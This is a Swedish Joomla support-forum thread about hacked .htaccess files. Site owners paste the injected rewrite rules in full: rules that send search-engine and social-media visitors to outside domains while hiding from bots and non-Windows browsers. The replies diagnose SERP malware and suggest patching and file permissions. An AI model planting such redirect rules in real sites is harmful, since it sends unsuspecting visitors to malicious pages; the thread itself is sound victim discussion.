Hur kan .htaccess ändras "av sig själv"

[SwedEdit]

Fick problem med en av mina sajter häromdagen. I princip inget fungerade utom index-sidan. Menyklick resulterade i att jag fick 404 på alla menylänkar.
Jag kör fortfarande 1.6.5 (ja, jag vet att jag borde uppgradera till 2.5!).

Min normala .htaccess fil innehåller det som en sådan fil normalt innehåller + ett antal 301 redirects.
Har kollat med webhotellet och det skall bara var jag (mitt IP-nummer) som varit och "ftp-at".

Någon har har i alla fall lyckats byta ut min fil till en med följande innehåll:



<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|[censored]\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*qKz.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.net/url?sa=t&source=web&cd=2&ved=0NmqR24Ob&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Mseq7I6a2zqI2OzlA4+pa1oQ==&usg=-tRU-YYqonXU8xmxK-4XRY&sig2=ZH8iC3aXAy2g9YKGRoLFIG [R=302,L,CO=qKz:25:%{HTTP_HOST}:9835:/:0:HttpOnly]
</IfModule>
#34eab213c50f4a92c18ab4fcf1d9e500fd0a75ca9b014cdbaecaae77



Denna text dök upp efter att jag i Wordpad scrollat och scrollat ner en hel massa på sidan. Efter ovanstående text var det en otrolig massa blanka rader igen.

Hur har det gått till??
Hur kan man skydda sig?

[Teqorious]

Jag sitter med samma problem med flera av mina sidor.
Skriver man in adressen manuellt till sidan kan man komma in men när man söker i google på företaget och klickar där så kommer man bara tillbaka till googles startsida.

Mina .htaccess filer ser ut som nedan:

Jag har bytt ut .htaccess filerna men det kommer tillbaka hela tiden och man kommer inte in på sidan.
Finns det någon som har en lösning på detta?

"<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|[youtube]|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*) RewriteRule ^(.*)$ http://2013-register.ru/plastic?7 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://2013-register.ru/plastic?7 [R=301,L] </IfModule>..."

[EE Photo]

Ja du kan ju börja med att uppdatera till en Joomla version som inte är full med säkerhetshål. Sen kan du också sätta rättigheterna på .htaccess filen till 644.

[Teqorious]

Hej,

Tack för svar EE Photo, kollade en extra gång på det du nämnde...

På en av sidorna har jag Joomla ver. 2.5.6 och har rättigheterna 644 på .htaccess men det vill inte fungera tyvärr.

Fler ideer och lösningar välkomnas

[Per Yngve Berg]

Kör Forum Post Assistant http://forum.joomla.org/viewtopic.php?f=621&t=582860
så vi kan titta på konfigurationen till din server.

[Zello]

Det låter helt klart som SERP-virus

[SwedEdit]

Det låter helt klart som SERP-virus

Vad innebär det då?
Vad gör man åt det?

Sedan jag skapade tråden i februari har jag uppdaterat samtliga siter till 2.5.
Har trots det blivit drabbad ett par gånger.

[EE Photo]

Sökte runt lite på det här men hittar egentligen inget sätt att skydda sin htaccess fil på? Är det något särskilt man kan göra?

[Zello]

Ett steg åt det säkrare hållet är att sätta den till 444. Men har de tagit sig in på servern kan de ju göra i stort sätt vad de vill. Det viktiga är att hålla en säker miljö i allmänhet.

[EE Photo]

Jo precis, vad jag kunde läsa mig till så verkar det som att de flesta får sin egna dator smittad av en trojan som sedan stjäl ditt FTP lösenord och på så sätt så får dom tillgång till din server.